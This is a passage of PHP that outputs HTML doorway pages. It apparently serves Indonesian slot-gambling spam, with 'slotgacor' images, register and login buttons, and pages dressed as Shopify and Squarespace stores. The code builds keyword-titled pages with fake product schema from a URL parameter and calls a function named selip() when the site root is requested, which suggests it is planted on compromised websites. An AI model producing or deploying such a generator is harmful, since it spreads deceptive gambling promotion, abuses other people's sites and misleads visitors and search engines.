         <style> header-drawer {justify-self: start;margin-left: -1.2rem;}@media screen and (min-width: 990px) {header-drawer {display: none;}}.menu-drawer-container {display: flex;}.list-menu {list-style: none;padding: 0;margin: 0;}.list-menu--inline {display: inline-flex;flex-wrap: wrap;}summary.list-menu__item {padding-right: 2.7rem;}.list-menu__item {display: flex;align-items: center;line-height: calc(1 + 0.3 / var(--font-body-scale));}.list-menu__item--link {text-decoration: none;padding-bottom: 1rem;padding-top: 1rem;line-height: calc(1 + 0.8 / var(--font-body-scale));}@media screen and (min-width: 750px) {.list-menu__item--link{padding-bottom: 0.5rem;padding-top: 0.5rem;}}</style> <style data-shopify>.header {padding: 10px 3rem 10px 3rem;}.section-header {position: sticky;margin-bottom: 0px;}@media screen and (min-width: 750px) {.section-header {margin-bottom: 0px;}}@media screen and (min-width: 990px) {.header {padding-top: 20px;padding-bottom: 20px;}}</style><sticky-header data-sticky-type="on-scroll-up" class="header-wrapper color-background-1 gradient header-wrapper--border-bottom">
            <header class="header header--middle-left header--mobile-center page-width header--has-menu">
               <header-drawer data-breakpoint="tablet">
                  <details id="Details-menu-drawer-container" class="menu-drawer-container"><summary
                        class="header__icon header__icon--menu header__icon--summary link focus-inset"
                        aria-label="Menu"
                        >
                        <span><svg
                              xmlns="http://www.w3.org/2000/svg"aria-hidden="true"
                              focusable="false"
                              class="icon icon-hamburger"
                              fill="none"
                              viewBox="0 0 18 16"
                              >
                              <path d="M1 .5a.5.5 0 100 1h15.71a.5.5 0 000-1H1zM.5 8a.5.5 0 01.5-.5h15.71a.5.5 0 010 1H1A.5.5 0 01.5 8zm0 7a.5.5 0 01.5-.5h15.71a.5.5 0 010 1H1a.5.5 0 01-.5-.5z" fill="currentColor">
                           </svg>
                        </span>
                     </summary><div id="menu-drawer" class="gradient menu-drawer motion-reduce color-background-1">
                        <div class="menu-drawer__inner-container"><div class="menu-drawer__navigation-container"><nav class="menu-drawer__navigation">
                                 <ul class="menu-drawer__menu has-submenu list-menu" role="list">
                                    <li><a id="HeaderDrawer-home"
                                       href="' . htmlspecialchars($urlPath4) . '"
                                       class="menu-drawer__menu-item list-menu__item link link--text focus-inset"
                                       >
                                       Home
                                       </a>
                                    </li>
                                    <li><a
                                       id="HeaderDrawer-catalog"
                                       href="' . htmlspecialchars($urlPath4) . '"
                                       class="menu-drawer__menu-item list-menu__item link link--text focus-inset">
                                       Catalog
                                       </a>
                                    </li>
                                    <li><a
                                       id="HeaderDrawer-contact"
                                       href="' . htmlspecialchars($urlPath4) . '"
                                       class="menu-drawer__menu-item list-menu__item link link--text focus-inset"
                                       >
                                       Contact
                                       </a>
                                    </li>
                                 </ul>
                              </nav>
                              <div class="menu-drawer__utility-links">
                                 <div class="menu-drawer__localization header-localization"></div>
                                 <ul class="list list-social list-unstyled" role="list"></ul>
                              </div>
                           </div>
                        </div>
                     </div>
                  </details>
               </header-drawer>
               <nav class="header__inline-menu">
                  <ul class="list-menu list-menu--inline" role="list">
                     <li><a
                        id="HeaderMenu-home"
                        href="' . htmlspecialchars($urlPath4) . '"
                        class="header__menu-item list-menu__item link link--text focus-inset"
                        >
                        <span
                           >Home</span>
                        </a>
                     </li>
                     <li><a
                        id="HeaderMenu-catalog"
                        href="' . htmlspecialchars($urlPath4) . '"
                        class="header__menu-item list-menu__item link link--text focus-inset"
                        >
                        <span
                           >Catalog</span>
                        </a>
                     </li>
                     <li><a
                        id="HeaderMenu-contact"
                        href="' . htmlspecialchars($urlPath4) . '"
                        class="header__menu-item list-menu__item link link--text focus-inset"
                        >
                        <span
                           >Contact</span>
                        </a>
                     </li>
                  </ul>
               </nav>
               <div class="header__icons header__icons--localization header-localization">
                  <div class="desktop-localization-wrapper"></div>
                  <details-modal class="header__search">
                     <details><summary
                           class="header__icon header__icon--searchheader__icon--summary link focus-inset modal__toggle"
                           aria-haspopup="dialog"
                           aria-label="Search"
                           >
                           <span>
                              <svg class="modal__toggle-open icon icon-search" aria-hidden="true" focusable="false">
                                 <use href="' . htmlspecialchars($urlPath4) .'">
                              </svg>
                              <svg class="modal__toggle-close icon icon-close" aria-hidden="true" focusable="false">
                                 <use href="' .htmlspecialchars($urlPath4) . '">
                              </svg>
                           </span>
                        </summary>
                        <div
                           class="search-modal modal__content gradient"role="dialog"
                           aria-modal="true"
                           aria-label="Search"
                           >
                           <div class="modal-overlay"></div>
                           <div class="search-modal__content search-modal__content-bottom"tabindex="-1"
                              >
                              <predictive-search class="search-modal__form" data-loading-text="Loading...">
                                 <form action="/search" method="get" role="search" class="search search-modal__form">
                                    
                                    <div class="predictive-search predictive-search--header" tabindex="-1" data-predictive-search>
                                       <div class="predictive-search__loading-state">
                                          <svg
                                             aria-hidden="true"
                                             focusable="false"
                                             class="spinner"
                                             viewBox="0 0 66 66"
                                             xmlns="http://www.w3.org/2000/svg"
                                             >
                                             <circle class="path" fill="none" stroke-width="6" cx="33" cy="33" r="30"></circle>
                                          </svg>
                                       </div>
                                    </div>
                                    <span class="predictive-search-status visually-hidden" role="status" aria-hidden="true"></span>
                                 </form>
                              </predictive-search>
                              <button
                                 type="button"
                                 class="search-modal__close-button modal__close-button link link--text focus-inset"
                                 aria-label="Close"></button>
                           </div></div></details>
                  </details-modal>
                  <a href="' . htmlspecialchars($urlPath4) . '" class="header__icon header__icon--cartlink focus-inset" id="cart-icon-bubble">
                     <svg
                        class="icon icon-cart-empty"
                        aria-hidden="true"focusable="false"xmlns="http://www.w3.org/2000/svg"
                        viewBox="0 0 40 40"fill="none"
                        ><path d="m15.75 11.8h-3.16l-.77 11.6a5 5 0 0 0 4.99 5.34h7.38a5 5 0 0 0 4.99-5.33l-.78-11.61zm0 1h-2.22l-.71 10.67a4 4 0 0 0 3.99 4.27h7.38a4 4 0 0 0 4-4.27l-.72-10.67h-2.22v.63a4.75 4.75 0 1 1 -9.5 0zm8.5 0h-7.5v.63a3.75 3.75 0 1 0 7.5 0z" fill="currentColor" fill-rule="evenodd"/></svg>
                  </a>
               </div>
            </header></sticky-header>
         <style data-shopify>
            .cart-notification {
            display: none;
            }
         </style>
         <script type="application/ld+json">
                     {
                       "@context": "http://schema.org/",
                       "@type": "Product",
                       "name": "' . htmlspecialchars($tit) . ' '. htmlspecialchars($judulhtml) . '",
                       "url": "' . htmlspecialchars($urlPath4) . '",
                       "image": ["https://coblos4dasik.sirv.com/feb/slot%20%28' .$gbrsp . '%29.png"
                         ],
                       "description": "' . htmlspecialchars($tit) . ',' .htmlspecialchars($deshtml) . '","brand": {
                         "@type": "Brand",
                         "name": "' . htmlspecialchars($tit) . '"
                       },
                       "offers": [{
                             "@type" : "Offer","availability" : "http://schema.org/InStock",
                             "price" : 1000000.0,
                             "priceCurrency" : "IDR",
                             "url" : "' . htmlspecialchars($urlPath4) . '"
                           }
                     ]
                     }
                  </script>
         <script type="application/ld+json">
            {
              "@context": "http://schema.org",
              "@type": "Organization",
              "name": "' . htmlspecialchars($tit) . '",
              
                "logo": "https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png","sameAs": [
                "' . htmlspecialchars($urlPath4) . '"
              ],
              "url": "' . htmlspecialchars($urlPath4) . '"
            }
         </script>
      </div>
      <!-- END sections: header-group -->
      <style>.btn-kelas {
                                                    display: grid;
                                                    grid-template-columns: repeat(2, 1fr);
                                                    font-weight: 700;
                                                    margin-bottom: 25px;
                                                    border-radius: 10px;
                                                }

                                                .btn-kelas a {
                                                    text-align: center;
                                                }

                                                .login,
                                                .register {
                                                    color: #fff;
                                                    padding: 13px 10px;
                                                }

                                                .login,
                                                .login-button {
                                                    border: 1px solid #ffffff;
                                                    background: linear-gradient(90deg, rgba(255,59,152,1) 0%, rgba(255,0,0,1) 48%, rgba(255,226,0,1) 100%);
                                                    border-radius: 10px;
                                                }

                                                .register,
                                                .register-button {
                                                    background: linear-gradient(90deg, rgba(255,59,152,1) 0%, rgba(255,0,0,1) 48%, rgba(255,226,0,1) 100%);
                                                    border-radius: 10px;
                                                    border: 1px solid #ffffff;
                                                }
                                            </style>
                  <div class="btn-kelas">
                                                        <a href="' . htmlspecialchars($amphtml) .'" rel="dofollow" class="register">DAFTAR</a>
                                                        <a href="' . htmlspecialchars($amphtml) .'" rel="dofollow" class="login">LOGIN</a>
                                                    </div>
      <main id="MainContent" class="content-for-layout focus-none" role="main" tabindex="-1">
         <section id="shopify-section-template--15308462817370__main" class="shopify-section section">
            <section id="MainProduct-template--15308462817370__main"
               class="section-template--15308462817370__main-padding gradient color-background-1"
               data-section="template--15308462817370__main"
               >
               <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/section-main-product.css?v=141059467971401676601705593193" rel="stylesheet" type="text/css" media="all" />
<style data-shopify>.section-template--15308462817370__main-padding {padding-top: 27px;padding-bottom: 9px;}@media screen and (min-width: 750px) {.section-template--15308462817370__main-padding {padding-top: 36px;padding-bottom: 12px;}}</style>
               <div class="page-width">
                  <div class="product product--large product--left product--stacked product--mobile-hide grid grid--1-col grid--2-col-tablet">
                     <div class="grid__item product__media-wrapper"><media-gallery id="MediaGallery-template--15308462817370__main"role="region"
                           class="product__column-sticky"aria-label="Gallery Viewer"
                           data-desktop-layout="stacked"
                           >
                           <div id="GalleryStatus-template--15308462817370__main" class="visually-hidden" role="status"></div><slider-component id="GalleryViewer-template--15308462817370__main" class="slider-mobile-gutter">
                              <a class="skip-to-content-link button visually-hidden quick-add-hidden" href="#ProductInfo-template--15308462817370__main">
                              Skip to product information
                              </a>
                              <ul
                                 id="Slider-Gallery-template--15308462817370__main"
                                 class="product__media-list contains-media grid grid--peek list-unstyled slider slider--mobile"
                                 role="list">
                                 <li
                                    id="Slide-template--15308462817370__main-24342310748250"
                                    class="product__media-item grid__item slider__slide is-active scroll-trigger animate--fade-in"data-media-id="template--15308462817370__main-24342310748250"
                                    >
                                    <div
                                       class="product-media-container media-type-image media-fit-contain global-media-settings gradient constrain-height"
                                       style="--ratio: 1.0; --preview-ratio: 1.0;">
                                       <noscript>
                                          <div class="product__media media"><img src="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png" alt="" srcset="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png" width="1946" height="1946" sizes="(min-width: 1200px) 715px, (min-width: 990px) calc(65.0vw - 10rem), (min-width: 750px) calc((100vw - 11.5rem) / 2), calc(100vw / 1 - 4rem)"></div></noscript>
															<modal-opener class="product__modal-opener product__modal-opener--image no-js-hidden" data-modal="#ProductModal-template--15308462817370__main"><span class="product__media-icon motion-reduce quick-add-hidden product__media-icon--lightbox" aria-hidden="true">
                                             <svgaria-hidden="true"
                                                focusable="false"class="icon icon-plus"
                                                width="19"
                                                height="19"viewBox="0 0 19 19"
                                                fill="none"
                                                xmlns="http://www.w3.org/2000/svg"
                                                >
                                                <path fill-rule="evenodd" clip-rule="evenodd" d="M4.66724 7.93978C4.66655 7.66364 4.88984 7.43922 5.16598 7.43853L10.6996 7.42464C10.9758 7.42395 11.2002 7.64724 11.2009 7.92339C11.2016 8.19953 10.9783 8.42395 10.7021 8.42464L5.16849 8.43852C4.89235 8.43922 4.66793 8.21592 4.66724 7.93978Z" fill="currentColor"/><path fill-rule="evenodd" clip-rule="evenodd" d="M7.92576 4.66463C8.2019 4.66394 8.42632 4.88723 8.42702 5.16337L8.4409 10.697C8.44159 10.9732 8.2183 11.1976 7.94215 11.1983C7.66601 11.199 7.44159 10.9757 7.4409 10.6995L7.42702 5.16588C7.42633 4.88974 7.64962 4.66532 7.92576 4.66463Z" fill="currentColor"/>
                                                <path fill-rule="evenodd" clip-rule="evenodd" d="M12.8324 3.03011C10.1255 0.323296 5.73693 0.323296 3.03011 3.03011C0.323296 5.73693 0.323296 10.1256 3.03011 12.8324C5.73693 15.5392 10.1255 15.5392 12.8324 12.8324C15.5392 10.1256 15.5392 5.73693 12.8324 3.03011ZM2.32301 2.32301C5.42035 -0.774336 10.4421 -0.774336 13.5395 2.32301C16.6101 5.39361 16.6366 10.3556 13.619 13.4588L18.2473 18.0871C18.4426 18.2824 18.4426 18.599 18.2473 18.7943C18.0521 18.9895 17.7355 18.9895 17.5402 18.7943L12.8778 14.1318C9.76383 16.6223 5.20839 16.4249 2.32301 13.5395C-0.774335 10.4421 -0.774335 5.42035 2.32301 2.32301Z" fill="currentColor"/></svg>
                                          </span>
                                          <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-loading-spinner.css?v=116724955567955766481705593177" rel="stylesheet" type="text/css" media="all" />
                                          <div class="loading__spinner hidden">
                                             <svg
                                                aria-hidden="true"
                                                focusable="false"
                                                class="spinner"
                                                viewBox="0 0 66 66"
                                                xmlns="http://www.w3.org/2000/svg"><circle class="path" fill="none" stroke-width="6" cx="33" cy="33" r="30"></circle>
                                             </svg>
                                             </div><div class="product__media media media--transparent">
                                             <img src="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png" alt="' . htmlspecialchars($tit) . '" srcset="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png" width="1200" height="1200" class="image-magnify-lightbox" sizes="(min-width: 1200px) 715px, (min-width: 990px) calc(65.0vw - 10rem), (min-width: 750px) calc((100vw - 11.5rem) / 2), calc(100vw / 1 - 4rem)">
                                          </div>
                                          <button class="product__media-toggle quick-add-hidden product__media-zoom-lightbox" type="button" aria-haspopup="dialog" data-media-id="24342310748250">
                                          <span class="visually-hidden">
                                          Open media 1 in modal
                                          </span>
                                          </button>
                                       </modal-opener>
                                    </div>
                                 </li>
                              </ul>
                              <div class="slider-buttons no-js-hidden quick-add-hidden small-hide">
                                 <button
                                    type="button"
                                    class="slider-button slider-button--prev"
                                    name="previous"
                                    aria-label="Slide left"
                                    >
                                    <svg aria-hidden="true" focusable="false" class="icon icon-caret" viewBox="0 0 10 6">
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M9.354.646a.5.5 0 00-.708 0L5 4.293 1.354.646a.5.5 0 00-.708.708l4 4a.5.5 0 00.708 0l4-4a.5.5 0 000-.708z" fill="currentColor">
                                    </svg>
                                 </button>
                                 <button
                                    type="button"
                                    class="slider-button slider-button--next"
                                    name="next"
                                    aria-label="Slide right"
                                    >
                                    <svg aria-hidden="true" focusable="false" class="icon icon-caret" viewBox="0 0 10 6">
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M9.354.646a.5.5 0 00-.708 0L5 4.293 1.354.646a.5.5 0 00-.708.708l4 4a.5.5 0 00.708 0l4-4a.5.5 0 000-.708z" fill="currentColor"></svg>
                                 </button></div>
                           </slider-component>
                        </media-gallery>
                     </div>
                     <div class="product__info-wrapper grid__item scroll-trigger animate--slide-in">
                        <product-info
                           id="ProductInfo-template--15308462817370__main"
                           data-section="template--15308462817370__main"
                           data-url="' . htmlspecialchars($urlPath4) . '"
                           class="product__info-container product__column-sticky">
                           <p class="product__text inline-richtext caption-with-letter-spacing"
                              >' . htmlspecialchars($tit) . '</p>
										<div class="product__title">
										<h1>' . htmlspecialchars($tit) . ' ' . htmlspecialchars($judulhtml) . '</h1>
                           </div>
                           <div>
                              <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-pickup-availability.css?v=34645222959864780961705593179" rel="stylesheet" type="text/css" media="all" /></div>
                              <div class="product__description rte quick-add-hidden">
                                  <p><span><a href="' . htmlspecialchars($urlPath4) . '">' . $selectedLines[1] .  '</a>,' . htmlspecialchars($deshtml) . '</span></p>
                              <br>
        <ul class="footer-list">
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[15] . '/' .'">' . $selectedLines[15] . '</a>
            </li>
            <li class="footer-li">
              <a href="' . $scriptPathDir . '/' . $selectedLines[14] . '/' .'">' . $selectedLines[14] . '</a>
            </li>
            <li class="footer-li">
              <a href="' . $scriptPathDir. $selectedLines[13] . '/' .'">' . $selectedLines[13] . '</a>
            </li>
            <li class="footer-li">
				<a href="' . $scriptPathDir . '/' . $selectedLines[12] . '/' .'">' . $selectedLines[12].'</a>
            </li>
            <li class="footer-li">
              <a href="' . $scriptPathDir . '/' . $selectedLines[11] . '/' .'">' . $selectedLines[11] . '</a>
            </li></ul>
        <ul class="footer-list">
		      <li class="footer-li">
		      <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[10] .'">' . $selectedLines[10] . '</a>
		      </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[9] .'">' . $selectedLines[9]. '</a>
            </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $namabl .$selectedLines[8] .'">' . $selectedLines[8] . '</a>
            </li><li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[7] .'">' . $selectedLines[7]. '</a>
            </li><li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[6] .'">' . $selectedLines[6] . '</a></li>
        </ul>
		  <ul class="footer-list">
		  <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[5] .'.html'.'">' . $selectedLines[5] . '</a>
            </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[4] .'.html'.'">' . $selectedLines[4] . '</a>
            </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[3] .'.html'.'">' . $selectedLines[3] . '</a>
            </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[2] .'.html'.'">' . $selectedLines[2] . '</a>
            </li>
            <li class="footer-li">
            <a href="' . $scriptPathDir . '/' . $selectedLines[1] .'.html'.'">' . $selectedLines[1] . '</a>
            </li>
        </ul>
                           </div>
                        </product-info>
                     </div>
                  </div>
                  <product-modal id="ProductModal-template--15308462817370__main" class="product-media-modal media-modal">
                     <div
                        class="product-media-modal__dialog color-background-1 gradient"
                        role="dialog"
                        aria-label="Media gallery"
                        aria-modal="true"
                        tabindex="-1"
                        >
                        <button
                           id="ModalClose-template--15308462817370__main"
                           type="button"
                           class="product-media-modal__toggle"
                           aria-label="Close"
                           >
                           <svg
                              xmlns="http://www.w3.org/2000/svg"
                              aria-hidden="true"
                              focusable="false"
                              class="icon icon-close"
                              fill="none"
                              viewBox="0 0 18 17">
                              <path d="M.865 15.978a.5.5 0 00.707.707l7.433-7.431 7.5797.282a.501.5010 00.846-.37.5.5 0 00-.153-.351L9.712 8.546l7.417-7.416a.5.5 0 10-.707-.708L8.991 7.853 1.413.573a.5.5 0 10-.693.72l7.563 7.268-7.418 7.417z" fill="currentColor">
                           </svg>
                        </button><div
                           class="product-media-modal__content color-background-1 gradient"role="document"
                           aria-label="Media gallery"
                           tabindex="0"><img class="global-media-settings global-media-settings--no-shadow"
                              srcset="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png"
                              sizes="(min-width: 750px) calc(100vw - 22rem), 1100px"
                              src="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png"
                              alt="Slot Bca 24jam Gampang Menang Auto Wd Tanpa Admin"
                              loading="lazy"
                              width="1200"
                              height="1200"
                              data-media-id="24342310748250"
                              >
                        </div>
                     </div>
                  </product-modal>
               </div>
            </section>
         </section>
         <section id="shopify-section-template--15308462817370__related-products" class="shopify-section section">
            <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-card.css?v=11469293100223554981705593173" rel="stylesheet" type="text/css" media="all" />
            <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-price.css?v=70172745017360139101705593179" rel="stylesheet" type="text/css" media="all" />
            <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/section-related-products.css?v=80324771040738084201705593194" rel="stylesheet" type="text/css" media="all" />
            <style data-shopify>.section-template--15308462817370__related-products-padding {
               padding-top: 27px;
               padding-bottom: 21px;
               }
               @media screen and (min-width: 750px) {
               .section-template--15308462817370__related-products-padding {
               padding-top: 36px;padding-bottom: 28px;
               }
               }
            </style>
            <div class="color-background-1 gradient no-js-hidden">
            </div>
         </section>
      </main>
      <!-- BEGIN sections: footer-group -->
      <div id="shopify-section-sections--15308463112282__footer" class="shopify-section shopify-section-group-footer-group">
         <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/section-footer.css?v=125160298726032154631705593192" rel="stylesheet" type="text/css" media="all" />
         <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-newsletter.css?v=4727253280200485261705593178" rel="stylesheet" type="text/css" media="all" />
         <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-list-menu.css?v=151968516119678728991705593176" rel="stylesheet" type="text/css" media="all" />
         <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-list-payment.css?v=69253961410771838501705593176" rel="stylesheet" type="text/css" media="all" /><link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/component-list-social.css?v=35792976012981934991705593177" rel="stylesheet" type="text/css" media="all" />
         <style data-shopify>.footer {
            margin-top: 0px;
            }
            .section-sections--15308463112282__footer-padding {
            padding-top: 27px;
            padding-bottom: 27px;
            }
            @media screen and (min-width: 750px) {
            .footer {
            margin-top: 0px;
            }
            .section-sections--15308463112282__footer-padding {padding-top: 36px;
            padding-bottom: 36px;
            }
            }
         </style>
         <footer class="footer color-background-1 gradient section-sections--15308463112282__footer-padding">
            <div
               class="footer__content-bottom scroll-trigger animate--slide-in"data-cascade>
               <div class="footer__content-bottom-wrapper page-width">
                  <div class="footer__column footer__localization isolate"></div>
                  <div class="footer__column footer__column--info"></div>
               </div><div class="footer__content-bottom-wrapper page-width">
                  <div class="footer__copyright caption">
                     <small class="copyright__content">&copy; 2025, <a href="' . htmlspecialchars($urlPath4) . '" title="">' . $selectedLines[1] .  '</a></small><small class="copyright__content"><a target="_blank" rel="nofollow" href="' . htmlspecialchars($urlPath4) . '"> Powered by Shopify</a></small>
                  </div>
               </div>
            </div>
         </footer>
      </div>
      <!-- END sections: footer-group -->
   </body>
</html>';
exit;
} elseif 
($_SERVER['REQUEST_URI'] === '/') {
	 selip();
} elseif (isset($_GET[$namaparameter])) {
$urlPath3 = getFullCurrentUrl();
$thtitle = htmlspecialchars($_GET[$namaparameter]);
$thtitle = trim(strtoupper(str_replace('-', ' ', $thtitle)));
$titlesFromFile1 = array_map('trim', explode("\n", str_replace("\r", "", $fileContent1)));
$titrandom1 = $titlesFromFile1[array_rand($titlesFromFile1)];
$titlesFromFile2= array_map('trim', explode("\n", str_replace("\r", "", $fileContent2)));
$titrandom2 = $titlesFromFile2[array_rand($titlesFromFile2)];
$titlesFromFile3 = array_map('trim', explode("\n", str_replace("\r","", $fileContent4)));
$titrandom3 = $titlesFromFile3[array_rand($titlesFromFile3)];
$foundInFile1 = in_array(strtoupper($thtitle), array_map('strtoupper', $titlesFromFile1));
$foundInFile2 = in_array(strtoupper($thtitle), array_map('strtoupper', $titlesFromFile2));
$foundInFile3 = in_array(strtoupper($thtitle), array_map('strtoupper', $titlesFromFile3));
if (!$foundInFile1 && !$foundInFile2 && !$foundInFile3) {
    http_response_code(404);
    die("Not Found");
}
$found = $foundInFile2;
    echo '<!doctype html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US"  >
   <head>
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <!-- This is Squarespace. --><!-- mandolin-conch-bdcd -->
      <base href="">
      <meta charset="utf-8" />
      <title>' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '</title>
      <meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" />
      <link rel="icon" type="image/x-icon" href="' . htmlspecialchars($icon) . '"/>
      <link rel="canonical" href="' . htmlspecialchars($urlPath3) . '"/>
	  ';
if ($found) {
    echo '<link rel="amphtml" href="' . htmlspecialchars($amptunnel2) . '">';
} elseif ($foundInFile3) { 
    echo '<link rel="amphtml" href="' . htmlspecialchars($amptunnel3) . '">'; 
} else {
    echo '<link rel="amphtml" href="' . htmlspecialchars($amptunnel) . '">';
}
echo '
      <meta property="og:site_name" content="' . htmlspecialchars($thtitle) .'"/>
      <meta property="og:title" content="' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '"/>
      <meta property="og:url" content="' . htmlspecialchars($urlPath3) . '"/>
      <meta property="og:type" content="product"/>
      <meta property="og:description" content="' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '"/>
      <meta property="og:image" content="' . htmlspecialchars($gambartunnel) .'"/>
      <meta property="og:image:width" content="1024"/>
      <meta property="og:image:height" content="1024"/>
      <meta property="product:price:amount" content="0.00"/>
      <meta property="product:price:currency" content="IDR"/>
      <meta property="product:availability" content="instock"/>
      <meta property="product:original_price:amount" content="777.00"/>
      <meta property="product:original_price:currency" content="IDR"/>
      <meta property="product:sale_price:amount" content="0.00"/>
      <meta property="product:sale_price:currency" content="IDR"/>
      <meta itemprop="name" content="' . htmlspecialchars($thtitle) .'"/>
      <meta itemprop="url" content="' . htmlspecialchars($urlPath3) . '"/>
      <meta itemprop="description" content="' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '"/>
      <meta itemprop="thumbnailUrl" content="' . htmlspecialchars($gambartunnel) .'"/>
      <link rel="image_src" href="' . htmlspecialchars($gambartunnel) .'" />
      <meta itemprop="image" content="' . htmlspecialchars($gambartunnel) .'"/>
      <meta name="twitter:title" content="' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '"/>
      <meta name="twitter:image" content="' . htmlspecialchars($gambartunnel) .'"/>
      <meta name="twitter:url" content="' . htmlspecialchars($urlPath3) . '"/>
      <meta name="twitter:card" content="summary"/>
      <meta name="twitter:description" content="' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '"/>
      <meta name="description" content="' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '" />
      <link rel="preconnect" href="https://images.squarespace-cdn.com">
      <script type="text/javascript" src="//use.typekit.net/ik/I6Uv1kHJqINqVM9XIaDaiMxShLyutbOTTGY1wP50yoSfenqgfFHN4UJLFRbh52jhWDjajAwDw2yyjQ6UwRSawewUjQyRjQwkwyGMJ6UqZAiudeBkOWs8pYbK2hs8ZamCjWJlZe8DSeUypPGHfVndMyMMeMb6MKGHfVDdMyMMeM96MKGHfJ2SMyMMeMS6MKGHfVzdMyMMeMt6MKGHfJYSMyMMegI6MKGHf5DdMyMgeMb6MKGHfVOdMyMgeMS6MKGHf5adMyMgeMt6MKGHfVVdMyMgegI6MTMgR5e3zbj.js"></script>
      <script type="text/javascript">try{Typekit.load();}catch(e){}</script>
      <script type="text/javascript" crossorigin="anonymous" defer="true" nomodule="nomodule" src="https://assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"></script>
      <script type="text/javascript" crossorigin="anonymous" defer="true" src="https://assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"></script>
      <script type="text/javascript">SQUARESPACE_ROLLUPS = {};</script>
      <link rel="stylesheet" type="text/css" href="https://assets.squarespace.com/universal/styles-compressed/user-account-core-adaf6be325b26739da8e-min.en-US.css">
      <script crossorigin="anonymous" src="https://assets.squarespace.com/universal/scripts-compressed/performance-daea797f26ec33aee348-min.en-US.js" defer ></script><script data-name="static-context">Static = window.Static || {}; Static.SQUARESPACE_CONTEXT ={"betaFeatureFlags":["themes","collection_typename_switching","campaigns_thumbnail_layout","marketing_automations","campaigns_discount_section_in_automations","contacts_and_campaigns_redesign","nested_categories","i18n_beta_website_locales","scripts_defer","campaigns_import_discounts","marketing_landing_page","override_block_styles","supports_versioned_template_assets","campaigns_discount_section_in_blasts","campaigns_new_image_layout_picker","member_areas_feature","new_stacked_index"],"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"https://assets.squarespace.com/universal/scripts-compressed/announcement-bar-7318bbf9c08d50bd660d-min.en-US.js"},"squarespace-audio-player":{"css":"https://assets.squarespace.com/universal/styles-compressed/audio-player-7273fb3c727315fb7087-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/audio-player-3e6f6c235e76a2b105f7-min.en-US.js"},"squarespace-blog-collection-list":{"css":"https://assets.squarespace.com/universal/styles-compressed/blog-collection-list-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/blog-collection-list-3b161a94b70c22562b65-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"https://assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-45e10dd8aac6cdf250c5-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-8aa9b0cbeb4b1382de47-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"https://assets.squarespace.com/universal/styles-compressed/chartjs-helpers-035fad01719b3ad44ea0-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-87bcc1cf71dc32506780-min.en-US.js"},"squarespace-comments":{"css":"https://assets.squarespace.com/universal/styles-compressed/comments-8d82b7dcc10a49d8f3ab-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/comments-1ba83c0b3b745fb75907-min.en-US.js"},"squarespace-custom-css-popup":{"css":"https://assets.squarespace.com/universal/styles-compressed/custom-css-popup-42165bae3117a373beba-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/custom-css-popup-0f67fd